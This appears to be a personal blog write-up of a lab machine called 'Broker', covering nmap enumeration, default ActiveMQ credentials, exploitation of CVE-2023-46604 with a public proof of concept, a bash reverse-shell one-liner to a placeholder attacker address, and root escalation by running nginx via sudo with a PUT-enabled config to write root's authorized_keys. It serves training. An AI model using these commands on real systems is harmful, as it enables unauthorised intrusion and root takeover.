Broker - Balejin's Blog

Easy rated box
Machine hosting an ActiveMQ server on port 61616

Enumeration#

I’ll start off with an nmap scan to discover any open ports.

nmap -sV -p- 10.10.11.243

ActiveMQ is running on port 61616 is what caught my attention, but I also wanted to know what version of ActiveMQ is running so I ran nmap with -sC after. It turns out it’s hosting ActiveMQ version 5.15.15

I was also very curious also about port 8161 as it’s providing a 401 unauthorized error. I did a quick research on the default credentials for Active MQ and it turns out that the default usernameis admin:admin which led me to a very interesting site.

I went and did a vulnerability search on this specific version on ActiveMQ and it turns out it that the first result was cve-2023-46604 with a CVSS rating of 10.0

I tried to look for a POC and I decided to use this one

Exploitation#

The exploit mentioned in the Enumeration section exploits a deserialization vulnerability on Java OpenWire in order to execute arbitrary shell commands. The PoC also provides a malicious xml file which holds commands executed on the remote server

python3 exploit.py -i 10.10.11.243 -p 61616 -si <your-ip> -sp <your-port>

I then opened a nc listener for a reverse shell

bash -i >& /dev/tcp/<ip>/<port> 0>&1

Post Exploitation#

Sudo privileges for the nginx binary was allowed for the activeMQ user after performing sudo -l

I created an nginx.conf with the PUT method allowed and set that as the default configuration file to allow me to write to the authorized_keys file in root’s .ssh folder

After creating the file, I set it as the default using this command:

sudo nginx -c /tmp/nginx.conf

I then used curl to write my public key to root’s authorized_keys file in the .ssh folder

curl -X PUT localhost:12345/root/.ssh/authorized_keys -d "<public-key>"

Lastly, I used my private key to ssh into root

ssh -i id_rsa [email protected]